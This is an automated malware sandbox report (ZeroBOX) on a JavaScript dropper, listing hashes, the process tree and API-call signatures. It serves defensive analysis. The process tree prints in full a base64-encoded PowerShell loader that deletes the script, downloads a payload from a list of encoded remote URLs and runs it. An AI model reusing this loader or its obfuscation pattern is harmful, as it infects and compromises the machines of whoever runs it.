Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 26, 2023, 10:19 a.m.	May 26, 2023, 10:21 a.m.

Size	200.3KB
Type	ASCII text, with very long lines, with CRLF line terminators
MD5	`4d48de20c83249d87d86996c607415fd`
SHA256	`011983f9bd6b4f0aae15bf995a8fe0c45bb964f8085189a5246e87bac4cd6e7f`
CRC32	`DC39DC91`
ssdeep	`3072:kLRxr4l1qDvatIVFcWwblWrj6/ns5JoDXn0Pns:lDqDvatIVifQJorKs`
Yara	None matched

wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\Lufp.js
2556
- wscript.exe "C:\Windows\System32\wscript.exe" "C:\ProgramData\diversityCourtby.js" isohelNoncumulatively Blackmailers storified thyrotomy
  2796
  - powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "dAByAHkAIAB7AHIAbQAgAEMAOgBcAFwAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAXABkAGkAdgBlAHIAcwBpAHQAeQBDAG8AdQByAHQAYgB5AC4AagBzADsAfQAgAGMAYQB0AGMAaAAgAHsAfQAkAG0AZQB0AGgAbwBkACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATgBBAEEAdQBBAEQARQBBAE4AQQBBAHoAQQBDADQAQQBPAEEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQAWQBBAEwAdwBCAGEAQQBHAE0AQQBTAEEAQgByAEEAQwA4AEEAYQBBAEIAWgBBAEcAawBBAGUAUQBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAFkAQQBMAGcAQQB4AEEARABFAEEATgBRAEEAdQBBAEQARQBBAE0AZwBBAHcAQQBDADQAQQBNAGcAQQB6AEEARABFAEEATAB3AEIASQBBAEMAOABBAFIAQQBBAHkAQQBHAEUAQQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEANABBAEQARQBBAEwAZwBBAHkAQQBEAFUAQQBOAEEAQQB1AEEARABFAEEATQBnAEEANABBAEMANABBAE8AQQBBADEAQQBDADgAQQBUAHcAQgBzAEEAQwA4AEEAUQB3AEEAdwBBAEYAQQBBAFAAdAB0AFgAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQASQBBAE0AUQBBADIAQQBDADQAQQBOAEEAQQAyAEEAQwA0AEEATQBnAEEAegBBAEQAawBBAEwAdwBCAFkAQQBFAFUAQQBMAHcAQgBaAEEAQQA9AD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAFEAQQB1AEEARABJAEEATQB3AEEAMgBBAEMANABBAE0AZwBBAHkAQQBDADQAQQBNAFEAQQAwAEEARABJAEEATAB3AEIAdABBAEYARQBBAGMAQQBCAFgAQQBFAEUAQQBPAEEAQgB1AEEAQwA4AEEAYQB3AEIANABBAEgAawBBAGEAZwBBADEAQQBBAD0APQBQAHQAdABYAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAWQBBAE0AZwBBAHUAQQBEAEkAQQBOAFEAQQB5AEEAQwA0AEEATQBRAEEAMwBBAEQASQBBAEwAZwBBAHgAQQBEAFUAQQBOAGcAQQB2AEEARgBRAEEATQB3AEIAeABBAEcANABBAFIAQQBBAHYAQQBGAEEAQQBXAEEAQgBPAEEASABVAEEAVwBRAEIAQgBBAEYAQQBBAFUAZwBBAD0AUAB0AHQAWABhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBPAEEAQQB1AEEARABJAEEATgBRAEEAMQBBAEMANABBAE0AZwBBAHgAQQBEAE0AQQBMAGcAQQAzAEEARABJAEEATAB3AEIAWABBAEQAVQBBAFQAdwBBAHYAQQBGAFEAQQBRAGcAQQA1AEEARwAwAEEAYQB3AEIATABBAEcAVQBBAE4AQQBCAFIAQQBIAG8AQQBkAFEAQQA9ACIAOwAkAE4AZQBwAGgAcgBvAHQAbwBtAGUAUwB1AGIAdQByAGIAYQBuAGkAdABlAHMAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQB6AEEAQwA0AEEATQBRAEEANABBAEQAYwBBAEwAZwBBAHgAQQBEAE0AQQBOAEEAQQB1AEEARABFAEEATwBBAEEAMwBBAEEAPQA9ACIAOwBmAG8AcgBlAGEAYwBoACAAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAAgAGkAbgAgACQAbQBlAHQAaABvAGQAIAAtAHMAcABsAGkAdAAgACIAUAB0AHQAWAAiACkAIAB7AHQAcgB5ACAAewAkAG0AdQBsAHQAaQBwAGEAcgBvAHUAcwBWAG8AbABhAHQAaQBsAGkAcwBpAG4AZwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQARQBBAE8AUQBBADEAQQBDADQAQQBNAGcAQQB3AEEARABNAEEATABnAEEAeABBAEQAVQBBAE0AQQBBAHUAQQBEAGMAQQBOAFEAQQA9AGgAbABFAEUAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABJAEEAWgBRAEIAdQBBAEcARQBBAGEAUQBCAHoAQQBIAE0AQQBZAFEAQgB1AEEASABRAEEAUgBRAEIANABBAEcAOABBAFkAdwBCAHYAQQBHADQAQQBaAFEAQQB1AEEASABRAEEAZAB3AEEAPQAiADsAJABoAGUAbQBpAGMAaQByAGMAdQBsAGEAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAQQBBAFkAUQBCAGsAQQBHAFEAQQBiAHcAQgBqAEEARwBzAEEAYwB3AEIAQwBBAEgAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAHcAQgAwAEEARwBFAEEAWgB3AEEAdQBBAEcAUQBBAFoAUQBCAHoAQQBHAGsAQQAiADsAJABzAHQAcgBhAHUAYwBoAHQAZQBuAEEAdQBsAGQAZgBhAHIAcgBhAG4AdABsAGkAawBlACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB5AEEARABFAEEATQBRAEEAdQBBAEQASQBBAE4AQQBBADEAQQBDADQAQQBOAFEAQQA1AEEAQwA0AEEATQBnAEEAMQBBAEQATQBBAFkAcwB3AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIARQBBAEcAawBBAGMAdwBCAHcAQQBHADgAQQBiAGcAQgBsAEEARgBRAEEAYgB3AEIAdQBBAEgATQBBAGIAdwBCAHkAQQBHAGsAQQBZAFEAQgBzAEEAQwA0AEEAWQB3AEIAcwBBAEcAawBBAGIAZwBCAHAAQQBHAE0AQQAiADsAJABtAGEAbgBuAGkAcwBoACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFAAcgBlAG0AbwBuAG8AcABvAGwAaQB6AGUAZAApACkAOwBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAkAG0AYQBuAG4AaQBzAGgAIAAtAE8AIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwA7ACQAZABpAHMAZQBhAHMAaQBuAGcAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAFEAQQBIAEkAQQBaAFEAQgBoAEEARwB3AEEAYgBBAEIAcABBAEcAVQBBAFoAQQBBAHUAQQBHAE0AQQBiAHcAQgB0AEEAQQA9AD0AIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIABDADoAXABcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFwATABlAGcAaQBiAGwAZQAuAHUAbgBmAHIAZQBlAGkAbgBnAGwAeQBNAGEAdABhAGMAbwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANQA3ADQAMAAyACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEAUQB3AEEANgBBAEYAdwBBAFUAQQBCAHkAQQBHADgAQQBaAHcAQgB5AEEARwBFAEEAYgBRAEIARQBBAEcARQBBAGQAQQBCAGgAQQBGAHcAQQBUAEEAQgBsAEEARwBjAEEAYQBRAEIAaQBBAEcAdwBBAFoAUQBBAHUAQQBIAFUAQQBiAGcAQgBtAEEASABJAEEAWgBRAEIAbABBAEcAawBBAGIAZwBCAG4AQQBHAHcAQQBlAFEAQgBOAEEARwBFAEEAZABBAEIAaABBAEcATQBBAGIAdwBBAHMAQQBHAEkAQQBhAFEAQgB1AEEARwBRAEEATwB3AEIAMQBBAEUASQBBAGIAQQBCAHYAQQBHAE0AQQBhAHcAQQA3AEEAQQA9AD0AIgA7ACQAcwBtAG8AbwBjAGgAeQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEcAVQBBAGIAZwBCAGgAQQBHAFUAQQBiAGcAQgBoAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AIgA7ACQAcwBwAGwAZQBuAG8AdABvAG0AeQBJAG4AdAByAGEAZABpAHMAdAByAGkAYwB0ACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBRAEEAeABBAEMANABBAE4AQQBBAHoAQQBDADQAQQBNAGcAQQB3AEEARABjAEEATABnAEEAeABBAEQAVQBBAE4AZwBBAD0AIgA7AGIAcgBlAGEAawA7AH0AfQAgAGMAYQB0AGMAaAAgAHsAfQB9AA=="
    2908

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (6 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 26, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 26, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 26, 2023, 10:20 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 26, 2023, 10:20 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (44 events)

Time & API	Arguments	Status	Return
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b500 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bc80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b4c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b4c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b4c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069b0c0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069ba80 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069be00 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 26, 2023, 10:20 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0069bd40 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 26, 2023, 10:20 a.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 136 events)

Time & API	Arguments	Status
NtProtectVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2796 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73bc2000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 786432 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x029e0000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a60000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72891000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x72892000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f22000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f32000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a61000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a62000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f33000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f34000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b7000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f2b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f92000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f35000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f9c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02980000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f36000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bc000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f93000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f94000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f95000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f96000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f97000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f98000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01f99000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory May 26, 2023, 10:20 a.m.	process_identifier: 2908 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a00000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
